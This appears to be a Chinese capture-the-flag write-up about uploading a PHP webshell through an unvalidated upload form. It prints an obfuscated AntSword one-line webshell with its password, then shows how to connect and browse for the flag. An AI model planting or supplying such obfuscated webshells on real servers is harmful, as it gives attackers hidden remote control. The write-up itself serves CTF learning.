如果你没有在 cnblog 作者为 carr0t2 中看到此文章,建议访问 原网页以获取更好的排版,图片体验
题目
思路
- 上传一句话木马,获取shell
工具
1、weevely,kali自带,可以生成一句话木马
2、中国蚁剑 https://github.com/AntSwordProject/antSword
windows下图形化的软件,下载安装都容易,升级版的中国菜刀
解法
1、用中国蚁剑里的插件做的一句话木马 名字是 生成shell
2、安装完后生成
3、非常高级
<?php // 使用时请删除此行, 连接密码: amNtMUqc ?>
<?php $hgey=create_function(chr(31536/876).chr(0646-0463).chr(01531-01352).base64_decode(\'bQ==\').str_rot13(\'r\'),chr(0175666/01176).chr(738-620).base64_decode(\'YQ==\').base64_decode(\'bA==\').chr(01641-01571).chr(20196/561).chr(0407-0224).str_rot13(\'b\').chr(98100/900).chr(0x220-0x1bb).base64_decode(\'KQ==\').base64_decode(\'Ow==\'));$hgey(base64_decode(\'OTIzO\'.\'DU1O0\'.\'BldkF\'.\'sKCRf\'.\'\'.chr(909-824).chr(0163375/01531).chr(0x15a-0x121).str_rot13(\'G\').base64_decode(\'Vg==\').\'\'.\'\'.str_rot13(\'S\').str_rot13(\'g\').chr(231-127).str_rot13(\'o\').base64_decode(\'VQ==\').\'\'.\'50TVV\'.\'xY10p\'.\'OzI3N\'.\'zE1Nj\'.\'U7\'.\'\'));?>
4、没有验证就很简单了,直接保存到文本里,后缀改.php,上传就可以了
5、填入地址,填入密码
6、然后就能执行shell,查看目录,上一层目录找一下就有了
